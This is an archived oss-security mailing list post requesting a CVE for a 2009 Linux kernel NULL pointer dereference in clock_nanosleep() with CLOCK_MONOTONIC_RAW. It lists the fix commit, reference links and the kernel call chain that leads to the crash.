oss-security - CVE request: kernel: clock_nanosleep() with CLOCK_MONOTONIC

Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Date: Thu, 06 Aug 2009 13:39:05 +0800
From: Eugene Teo <eugene@...hat.com>
To: oss-security@...ts.openwall.com
CC: "Steven M. Christey" <coley@...us.mitre.org>
Subject: CVE request: kernel: clock_nanosleep() with CLOCK_MONOTONIC_RAW NULL
 pointer dereference

Calling do_nanosleep() with clockid CLOCK_MONOTONIC_RAW can cause a NULL
pointer dereference. Appears to be introduced after commit 2d42244a
(v2.6.28-rc1).

Upstream commit:
http://git.kernel.org/linus/70d715fd0597f18528f389b5ac59102263067744

Reproducer/backtrace:
http://lkml.org/lkml/2009/8/4/28

clock_nanosleep ->
CLOCK_DISPATCH ->
common_nsleep(arglist) ->
hrtimer_nanosleep
      return hrtimer_nanosleep(tsave /* &ts */, rmtp /* NULL */,
                 flags & TIMER_ABSTIME /* turns out false */ ?
                 HRTIMER_MODE_ABS : HRTIMER_MODE_REL,
                 which_clock); ->
do_nanosleep ->
hrtimer_start_expires ->
hrtimer_start_range_ns ->
__hrtimer_start_range_ns ->
lock_hrtimer_base ->
...

References:
http://lkml.org/lkml/2009/8/2/331
http://lkml.org/lkml/2009/8/4/40
https://bugzilla.redhat.com/show_bug.cgi?id=515867

Thanks, Eugene

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.